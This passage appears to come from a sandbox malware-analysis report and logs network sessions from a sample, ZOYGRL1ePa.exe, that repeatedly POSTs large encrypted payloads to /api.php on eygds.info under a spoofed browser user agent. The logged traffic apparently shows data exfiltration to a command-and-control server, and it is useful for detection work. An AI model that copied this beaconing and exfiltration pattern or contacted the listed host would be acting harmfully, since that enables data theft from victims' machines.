Dec 30, 2024 01:58:22.703656912 CET	4944	OUT	Data Raw: 5a 56 73 70 6b 35 6b 69 7a 45 45 51 39 49 4f 39 41 4e 77 6b 70 63 77 51 5a 5a 44 77 33 67 72 42 37 59 69 58 56 78 57 56 2f 74 4e 4b 49 7a 44 54 4a 62 65 6d 45 73 32 74 36 54 4d 51 76 30 46 49 61 56 71 73 67 4c 37 4f 76 45 43 76 30 53 47 53 52 5a Data Ascii: ZVspk5kizEEQ9IO9ANwkpcwQZZDw3grB7YiXVxWV/tNKIzDTJbemEs2t6TMQv0FIaVqsgL7OvECv0SGSRZVnir7PjS0i21S53s7RtyHw8IN8kuGhccrJtDQPe1WfnuaQB3evzw01T5/dIq5xv5QlW3pLHiCk%2BNO46XHE4ZLdUU/bHKdTnUe6j7l7VE6rW9eAUiALecX3TFf02MeU77KuxWre2i1LUTPU6nMmBBhcVjjbjn5EM
Dec 30, 2024 01:58:22.707495928 CET	27192	OUT	Data Raw: 51 66 54 41 54 45 55 56 34 51 59 38 44 46 36 36 45 71 57 4a 42 4e 36 5a 55 63 75 61 6f 30 47 4c 54 50 36 30 47 65 45 73 4e 61 6a 6a 32 2f 38 6f 2f 37 6e 42 75 34 72 31 56 6d 73 66 50 56 55 72 38 36 32 4e 68 38 33 6e 58 46 48 25 32 42 65 62 56 32 Data Ascii: QfTATEUV4QY8DF66EqWJBN6ZUcuao0GLTP60GeEsNajj2/8o/7nBu4r1VmsfPVUr862Nh83nXFH%2BebV2vF18ST9Q6Pzk0%2BXllsk7VcMHki6VTdoOCe6%2BorVAbVoB05GGNSVHvOb0Cc0xsguDi/M8HCBmlvnNG0Ry/hfV//cn8TI7LfsYQiGyKQQriDGyhE4ISYy6B1vaoIDR0nS9rgWPIpPXqPf8O756cZE8B%2BXZKec

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49952	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:26.716959000 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49953	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:26.720362902 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49955	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:26.853657961 CET	281	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124324 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:27.209742069 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRyUTjxHSdd7uswO98TQC%2B0/WRRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSS
Dec 30, 2024 01:58:27.214657068 CET	7416	OUT	Data Raw: 71 62 52 45 32 7a 54 6c 5a 6e 36 25 32 42 6b 31 42 35 30 65 47 48 63 4a 36 53 62 55 47 73 4b 48 78 33 59 4c 47 6f 36 44 72 68 73 31 70 41 4d 37 6c 33 78 4c 5a 58 73 59 46 34 6a 53 65 61 31 4b 61 4d 51 45 70 65 25 32 42 49 57 56 6c 4a 53 4a 43 44 Data Ascii: qbRE2zTlZn6%2Bk1B50eGHcJ6SbUGsKHx3YLGo6Drhs1pAM7l3xLZXsYF4jSea1KaMQEpe%2BIWVlJSJCDNkzc8ymnYC0CSE%2BC3lC2KxPIxHiSf6tGi2YljQfXN%2BUqfcWlDFtovcKoymuLR9oHKST4A%2BUGhMPK6eX%2Bo/tvbjxfcC4fMwi7hI9Df3Au9bgNcpqdY9B9l0jbmUkXVUBD9DCWF5ir7LplYu6/YP9PYPlGc
Dec 30, 2024 01:58:27.214674950 CET	2472	OUT	Data Raw: 44 6b 70 56 44 76 5a 42 67 63 79 55 4c 34 55 46 32 53 49 4d 57 47 52 75 70 73 46 36 43 38 4b 36 30 4d 25 32 42 33 6d 33 58 75 66 48 25 32 42 37 63 51 77 42 61 68 74 65 59 56 52 59 66 2f 78 58 48 61 31 42 68 39 6a 38 4c 76 58 72 53 6a 4c 6c 54 46 Data Ascii: DkpVDvZBgcyUL4UF2SIMWGRupsF6C8K60M%2B3m3XufH%2B7cQwBahteYVRYf/xXHa1Bh9j8LvXrSjLlTFvrWqu/tHF0LPAPKe41xP/l89csBvcYC2ASPmOcMvyVwTaoCLL%2BWyvz5C1ZlDDTOuaBh64P6mZvHcMgjwH6wfI5SzGu%2BxsolmVSM%2B0NF00Vyc/m97zwjsMD90CH7H3f38EOw0C1myHLXHmvfeytt7QBoUmw8
Dec 30, 2024 01:58:27.214709044 CET	2472	OUT	Data Raw: 30 25 32 42 25 32 42 58 37 38 31 4c 6e 43 4a 6a 4c 4a 75 4b 6c 7a 4f 6f 35 53 74 65 42 46 37 4d 66 34 25 32 42 63 65 51 68 69 32 37 25 32 42 30 75 69 68 49 70 76 48 56 50 35 72 59 68 25 32 42 75 34 46 38 6e 71 33 31 71 6e 33 41 76 62 48 54 65 36 Data Ascii: 0%2B%2BX781LnCJjLJuKlzOo5SteBF7Mf4%2BceQhi27%2B0uihIpvHVP5rYh%2Bu4F8nq31qn3AvbHTe6kxXv8KA2iW4rYsZt4Rm5CDWEHgZcuEyqK7CA%2BdbRbE1N0iBnABFDqX8yW9kChUvIYbI0ExzbLWpNEML/lTK9t34We49//VcPP3hlhT3sbWQntNuNLErjqBOQ/rI9F%2BSz8dP9lLse4UpDj%2BW%2B6qvI0wtvd
Dec 30, 2024 01:58:27.214730024 CET	4944	OUT	Data Raw: 42 6e 44 32 68 37 55 25 32 42 4a 36 43 61 77 64 50 56 6b 38 45 44 54 58 47 6d 30 43 77 43 47 4b 64 58 4d 33 56 54 7a 75 2f 48 4a 69 6f 4d 77 4b 46 79 4a 56 2f 78 6a 56 68 42 2f 35 62 44 49 70 58 73 70 58 66 41 42 77 68 43 4c 35 64 4a 72 25 32 42 Data Ascii: BnD2h7U%2BJ6CawdPVk8EDTXGm0CwCGKdXM3VTzu/HJioMwKFyJV/xjVhB/5bDIpXspXfABwhCL5dJr%2BMhdNnQNn9tlBuC9NCwzvc7gV2EJCcOXNU3rMVq6KED/ZOe7omDAMvhnI4kpMwrLa1iLwiq1ls6ojR16oGj7lDDdc7RwCfchYgQHObK9GSWkIcZ7GNZZx5YPuJBk4A2D0CD%2Bu6Q8osLh4YvkNAmOtk2rYpXJbPfn
Dec 30, 2024 01:58:27.214900017 CET	7416	OUT	Data Raw: 59 79 64 4a 6d 5a 25 32 42 77 36 37 4a 72 75 75 56 41 72 48 64 30 46 39 75 74 55 79 35 7a 4c 66 33 76 6a 7a 30 4c 32 59 63 36 39 64 77 5a 4e 34 68 6a 65 39 61 39 33 50 5a 35 6d 78 53 52 43 2f 6d 66 67 6a 66 5a 57 44 38 79 35 4b 6f 54 6d 44 65 57 Data Ascii: YydJmZ%2Bw67JruuVArHd0F9utUy5zLf3vjz0L2Yc69dwZN4hje9a93PZ5mxSRC/mfgjfZWD8y5KoTmDeWnsYIXJOxLL%2BThcqR0fJ855ex%2BUNVFMyPWPnPiYvDRh8zb33DXtU0zIxs6S5jKDCkSW9IIFo6hDZWMzWoh4QaCE8rJk3hAf6zx1J1prTdLYLIwvQodh4l8Skf3zRCgq43JRWXAMGlO6jgUF8A5490%2BBqSyIs
Dec 30, 2024 01:58:27.219568014 CET	2472	OUT	Data Raw: 6a 53 39 6a 78 42 7a 79 61 6f 6a 63 6a 57 6a 51 38 63 43 51 6e 78 72 6d 33 4c 66 67 42 4b 55 6c 69 42 54 35 37 54 67 75 33 36 45 62 39 4b 7a 77 45 70 35 66 63 34 45 54 41 6f 44 51 38 33 64 7a 73 61 79 36 47 4e 78 32 73 41 78 57 71 50 69 61 58 36 Data Ascii: jS9jxBzyaojcjWjQ8cCQnxrm3LfgBKUliBT57Tgu36Eb9KzwEp5fc4ETAoDQ83dzsay6GNx2sAxWqPiaX6r6p38GoL1wOwKGwK4LpYfHHAeXE7UfOgbxdgW243N4IlcHwvLmspe1JfU3I1ptyyvUptInYL7DclFd86OyF1WSU3QiQYpc%2BI8C%2BKXpK7R4R8Yirc0ajj7hnf4t6ZEg0%2BQezh9F5E3NqBF6tcaHXT5LD81nY
Dec 30, 2024 01:58:27.219590902 CET	2472	OUT	Data Raw: 63 6c 62 50 51 62 67 51 71 56 5a 7a 53 73 4c 39 6b 74 33 6f 6c 74 30 51 50 56 68 39 45 58 69 41 4e 30 4b 42 4a 36 69 46 7a 39 42 44 6d 47 50 34 68 6f 37 73 37 48 34 5a 4e 67 6b 6c 6e 58 57 55 41 6b 74 35 72 59 6a 32 61 52 38 31 49 38 53 77 25 32 Data Ascii: clbPQbgQqVZzSsL9kt3olt0QPVh9EXiAN0KBJ6iFz9BDmGP4ho7s7H4ZNgklnXWUAkt5rYj2aR81I8Sw%2Bg9WsKLp3TCWQkAgz52qONSCehTJ32cmIM%2B0TMCJj3G7umI8lLQlaI9ryfTpFtZ0OX32GUo4VvEWsohB4Y9dTNPlJFoAP9bESb8kypxp1d0MOxX3iUGqbKz65SsKOXz9rjW/e0Vlkpbdvv0R5w78nD4sQOsbU7h
Dec 30, 2024 01:58:27.219616890 CET	4944	OUT	Data Raw: 74 31 78 73 57 6b 39 6f 72 79 76 66 6b 43 58 35 52 33 41 52 45 74 43 77 39 72 58 48 61 53 33 5a 71 69 47 4f 41 77 6b 34 42 69 77 78 47 44 41 6b 63 53 58 44 4f 7a 2f 76 71 46 76 74 44 39 33 63 72 59 4c 46 44 37 66 5a 6f 74 75 65 46 54 61 4d 56 34 Data Ascii: t1xsWk9oryvfkCX5R3AREtCw9rXHaS3ZqiGOAwk4BiwxGDAkcSXDOz/vqFvtD93crYLFD7fZotueFTaMV4qwLHfzF2AjTN%2BYU/74BHSPalatYp7HyR2PJxhNHq7L4RZUgpfh3bgcn2ImBPKjGxnWxvwRM6KE3jgjYA3sKjn4G0eyFZ2V4YBYi59x1B3UFw3czinJeqgqJ8s%2BckRyyV6wzgpJNrv%2BUxA3oVWgi4Pcmrvwa
Dec 30, 2024 01:58:27.219733953 CET	2472	OUT	Data Raw: 6d 47 45 75 62 50 70 4e 65 49 58 49 67 38 6b 66 2f 31 74 37 6f 41 51 52 51 61 46 36 63 49 50 67 76 46 67 47 45 72 6b 56 51 78 4e 6c 63 54 59 48 59 79 7a 6e 46 54 56 36 48 25 32 42 71 38 73 4a 4c 48 75 68 66 79 30 70 56 4b 6d 4b 49 4b 71 30 56 2f Data Ascii: mGEubPpNeIXIg8kf/1t7oAQRQaF6cIPgvFgGErkVQxNlcTYHYyznFTV6H%2Bq8sJLHuhfy0pVKmKIKq0V/IaPI7SyjUueJ/H/ZkLyf5KYP9%2Bh9SPTiQS%2BcenFM%2BN6DQ7JS5Zl2fv0qmv5TtNFAQ18rWW9XwVJMBnmh6NWqTgNdEm2nWDg5/f1Q3ouLjxZs7g%2BHxw4Yoj0jGeNeXYB%2BRrTWOsXQ7y4%2BbfwSzM19V
Dec 30, 2024 01:58:27.394285917 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 32 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:27 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49972	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:29.325347900 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:58:29.678195953 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcf47Zq3rTAr6XXubM7KmGxwk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:58:29.869223118 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:29.869410992 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:29 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:29.869447947 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:29.869483948 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49973	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:29.325752974 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:29.678186893 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:29.877322912 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:29.877562046 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:29 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:29.877577066 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:29.877592087 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not
Dec 30, 2024 01:58:29.877801895 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124322 Expect: 100-continue
Dec 30, 2024 01:58:30.028670073 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:30.028892040 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:29 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
